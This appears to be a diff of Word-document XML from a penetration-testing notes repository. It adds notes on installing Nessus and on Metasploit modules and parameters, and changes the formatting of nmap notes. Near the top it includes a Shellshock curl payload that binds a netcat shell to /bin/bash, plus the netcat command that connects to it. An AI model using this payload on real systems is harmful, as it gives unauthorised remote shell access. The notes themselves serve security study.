@@ -1466,7 +2715,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">curl -A '() { :; }; echo; /bin/bash -c "nc -lp 65000 -e /bin/bash"' </w:t>
+        <w:t>curl -A '() { :; }; echo; /bin/bash -c "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>lp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 65000 -e /bin/bash"' </w:t>
       </w:r>
       <w:hyperlink r:id="rId4" w:history="1">
         <w:r>
@@ -1500,12 +2781,21 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc 192.168.46.234 65000 -v</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.46.234 65000 -v</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1525,8 +2815,114 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>script /dev/null -c bash</w:t>
-      </w:r>
+        <w:t xml:space="preserve">script /dev/null -c bash </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>___________________________________________________________________________</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>NESSUS:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>```````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Tenable Nessus is a widely used remote security and vulnerability scanning tool used by penetration testers and IT security professionals. It identifies software flaws, missing patches, malware, and misconfigurations across various networks, operating systems, and applications before </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cyberattackers</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> can exploit them.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Key Features &amp; Versions</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Nessus Essentials: The free, entry-level version allowing you to scan up to 16 IP addresses. It is ideal for home labs, students, and small-scale testing.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Nessus Professional: The industry standard for vulnerability assessment, offering unlimited scanning capacity, advanced reporting, and live updates.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Nessus Expert: Designed for modern environments, it adds external attack surface discovery and infrastructure-as-code (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>IaC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) scanning.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Download &amp; Install: Download the software for your specific operating system (e.g., Windows, Linux/Kali, or macOS) via the Tenable Downloads page.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>https://www.tenable.com/downloads</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Nessus-----------.deb</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -1534,7 +2930,639 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-    </w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>dpkg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Nessus----------.deb</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>systemctl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> status </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Nessus.service</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>systemctl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> start </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Nessus.service</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Access the Interface: Once the service is running, access the web-based GUI in your browser at </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>https://localhost:8834</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (or using your remote IP address).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Obtain an Activation Code: Register for a free license key </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Metasploit Framework:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>`````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Metasploit is the most widely used exploitation framework. The Metasploit framework is a set of open-source tools for network enumeration, identifying vulnerabilities, developing payloads, and executing exploit code against remote target machines.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Metasploit has two main versions:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Metasploit Pro: The commercial version that facilitates the automation and management of tasks. This version has a graphical user interface (GUI).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Metasploit Framework: The open-source version that works from the command line. This room will focus on this version, installed on the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>AttackBox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and most commonly used penetration testing Linux distributions.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>: The main command-line interface.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>2. Main Components::Modules</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Auxiliary </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Exploits</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Payloads</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Encoders</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Evasion</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> NOPs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Post</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve"> Auxiliary: Any supporting module, such as scanners, crawlers and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>fuzzers</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, can be found here.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Encoders: Encoders will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them. Signature-based antivirus and security solutions have a database of known threats. They detect threats by comparing suspicious files to this database and raise an alert if there is a match. Thus encoders can have a limited success rate as antivirus solutions can perform additional checks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Evasion: While encoders will encode the payload, they should not be considered a direct attempt to evade antivirus software. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="cs"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:t>evasion</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="cs"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> modules will try that, with more or less success.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Exploits: Break into Security. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Payloads: Payloads are codes that will run on the target system. Exploits will leverage a vulnerability on the target system, but to achieve the desired result, we will need a payload. Examples could be; getting a shell, loading a malware or backdoor to the target system, running a command, or launching calc.exe as a proof of concept to add to the penetration test report.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Post Module: Post modules will be useful on the final stage of the penetration testing process, post-exploitation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> No </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>OPeration</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Module: NOPs (No </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>OPeration</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) do nothing, literally. They are often used as a buffer to achieve consistent payload sizes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>MSFCONSOLE:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Setup DB:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msfdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">or </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msfdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>reinit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Launch Command: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Once launched, you will see the command line changes to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>help</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>While on the subject, the help command can be used on its own or for a specific command.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>history</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>You can use the history command to see commands you have typed earlier</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>use</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>The module to be used can be selected with the use command followed by the number at the beginning of the search result line.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>show</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The prompt tells us we now have a context set in which we will work. You can see this by typing the show options command.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>back</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>You can leave the context using the back command.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>search</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> One of the most useful commands in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> is search. This command will search the Metasploit Framework database for modules relevant to the given search parameter.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Y</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ou can conduct searches using CVE numbers, exploit names (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>eternalblue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>heartbleed</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, etc.), or target system.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> &gt; set RHOSTS, RPORT, LHOSTS, PAYLOAD, SESSION, etc [Parameters that you will often use]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> 1. RHOSTS: Remote host, the IP address of the target system. A single IP address or a network range can be set. This will support the CIDR (Classless Inter-Domain Routing) notation (/24, /16, etc.) or a network range (10.10.10.x </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="cs"/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> 10.10.10.y). You can also use a file where targets are listed, one target per line using file:/path/of/the/target_file.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>2. RPORT: Remote port, the port on the target system the vulnerable application is running on.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>3. PAYLOAD: The payload you will use with the exploit.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>4. LHOST: Localhost, the attacking machine IP address.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>5. LPORT: Local port, the port you will use for the reverse shell to connect back to. This is a port on your attacking machine, and you can set it to any port not used by any other application.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>6. SESSION: Each connection established to the target system using Metasploit will have a session ID. You will use this with post-exploitation modules that will connect to the target system using an existing connection.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Once you have set a parameter, you can use the show options command to check the value was set correctly.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
     <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -2149,6 +4177,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

--- a/1.nmap.docx
+++ b/1.nmap.docx
@@ -37,8 +37,13 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>[ X.X.X.X ]</w:t>
-      </w:r>
+        <w:t xml:space="preserve">[ </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>X.X.X.X ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -50,8 +55,13 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>[ 80/TCP -STATE- HTTP ]</w:t>
-      </w:r>
+        <w:t xml:space="preserve">[ 80/TCP -STATE- </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>HTTP ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -217,8 +227,21 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:r>
-        <w:t>7 : echo [ICMP/IGMP] : ping</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>7 :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> echo [ICMP/IGMP</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>] :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ping</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -262,14 +285,37 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>SYN,ACK,RST,PSH,FIN,URG</w:t>
-      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>SYN,ACK</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>RST,PSH</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>FIN,URG</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p/>
     <w:p>
-      <w:r>
-        <w:t>3 way handshake</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>3 way</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> handshake</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1116,7 +1162,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>MAC Address: 84:A9:3E:8A:7E:37 (Hewlett Packard)</w:t>
+        <w:t xml:space="preserve">MAC Address: </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>84:A9:3E</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>:8A:7E:37 (Hewlett Packard)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1176,12 +1230,33 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>1) TCP Scan: [ Full Open Scan ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-------------------------------Determines a system/port being alive by completing a 3-way handshake (SYN ; SYN+ACK ; ACK)</w:t>
+        <w:t xml:space="preserve">1) TCP Scan: [ Full Open </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Scan ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-------------------------------Determines a system/port being alive by completing a 3-way handshake (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>SYN ;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> SYN+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ACK ;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ACK)</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1255,14 +1330,27 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>T  [TCP Scan]</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>T  [</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>TCP Scan]</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>NOTE: By default NMAP scan 1000 ports as result.</w:t>
+        <w:t xml:space="preserve">NOTE: By </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>default</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> NMAP scan 1000 ports as result.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1312,7 +1400,15 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>+ Port:[-p]</w:t>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Port:[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>-p]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1536,7 +1632,23 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.133 -p U:53,T21-25,80</w:t>
+        <w:t xml:space="preserve"> 192.168.206.133 -p U:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>53,T</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>21-25,80</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1776,23 +1888,43 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>-s [ Scan ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-T [ TCP Scan ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-p [ port ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-v [ verbose ]</w:t>
-      </w:r>
+        <w:t xml:space="preserve">-s [ </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Scan ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">-T [ TCP </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Scan ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">-p [ </w:t>
